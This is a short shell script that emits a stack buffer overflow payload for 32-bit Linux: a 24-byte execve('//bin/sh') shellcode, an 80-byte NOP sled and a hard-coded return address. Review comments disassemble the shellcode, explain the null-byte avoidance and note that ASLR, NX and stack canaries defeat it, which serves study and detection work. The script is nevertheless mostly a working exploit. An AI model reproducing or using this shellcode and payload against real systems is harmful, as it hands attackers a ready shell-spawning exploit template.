#!/bin/sh
# Exploit payload generator: writes to stdout a byte string intended to
# overwrite a vulnerable stack buffer on a 32-bit Linux target (int $0x80 and
# 32-bit registers below). Everything this script emits is an attack artefact;
# the comments here describe what is emitted and which platform defences stop
# it, for review and detection purposes.
#
# NOTE(review): '//' is not a comment introducer in sh. The three '//' lines
# below and the one before the final printf are executed as commands; they
# fail on stderr (no 'set -e' is in effect, so the script continues) and
# leave stdout untouched. Only the '#' lines are real comments.
// shellscript that overwrites the buffer with 
// some payload for opening a shell (the payload
// cannot contain any \x00)


# 24 bytes of i386 Linux execve("//bin/sh", {"//bin/sh", NULL}, NULL) code,
# stored as printf-style \xNN escapes and decoded by the printf at the bottom.
# Registers are zeroed with xorl/cltd and the syscall number is loaded with a
# byte move (movb %al) instead of movl, which is why the encoding contains no
# 0x00 byte (the "cannot contain any \x00" constraint stated above).
shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" 

# 24 bytes of shellcode

# "\x31\xc0"                      // xorl         %eax,%eax   eax = 0
# "\x50"                          // pushl        %eax        4 NUL bytes: terminator for the string pushed next
# "\x68\x6e\x2f\x73\x68"          // pushl        $0x68732f6e "n/sh"
# "\x68\x2f\x2f\x62\x69"          // pushl        $0x69622f2f "//bi" -> stack now holds "//bin/sh\0"
# "\x89\xe3"                      // movl         %esp,%ebx   ebx = pointer to "//bin/sh" (filename arg)
# "\x99"                          // cltd                     edx = sign-extend(eax) = 0 (envp = NULL)
# "\x52"                          // pushl        %edx        argv[1] = NULL
# "\x53"                          // pushl        %ebx        argv[0] = "//bin/sh"
# "\x89\xe1"                      // movl         %esp,%ecx   ecx = argv
# "\xb0\x0b"                      // movb         $0xb,%al    eax = 11 = SYS_execve on i386 Linux
# "\xcd\x80"                      // int          $0x80       invoke the syscall

# 80 bytes of 0x90 (x86 nop), the classic "nop sled" placed next to the
# shellcode. This byte run, like the execve sequence above, is a well-known
# signature commonly matched by network IDS and AV engines.
# NOTE(review): backticks are used for command substitution here; $( ... )
# is the modern equivalent.
padding=`perl -e 'print "\x90" x 80'`

# Output order: shellcode, padding, four bytes that read little-endian as the
# hard-coded stack address 0xbffff8e8, then four NUL bytes. Because the
# address is a fixed guess, the payload only functions on a target whose stack
# is at a predictable location and is executable: ASLR and NX/W^X each defeat
# it on their own, and a stack canary detects the overwrite before the
# overwritten return address is used.
# NOTE(review): \xNN escapes in a printf format string are a bash/GNU
# extension; POSIX printf defines only octal \ddd, so under a dash /bin/sh
# the bytes actually emitted differ from those intended. The unquoted
# expansions are also subject to word splitting and globbing.
// need s correct address in order to run
printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00"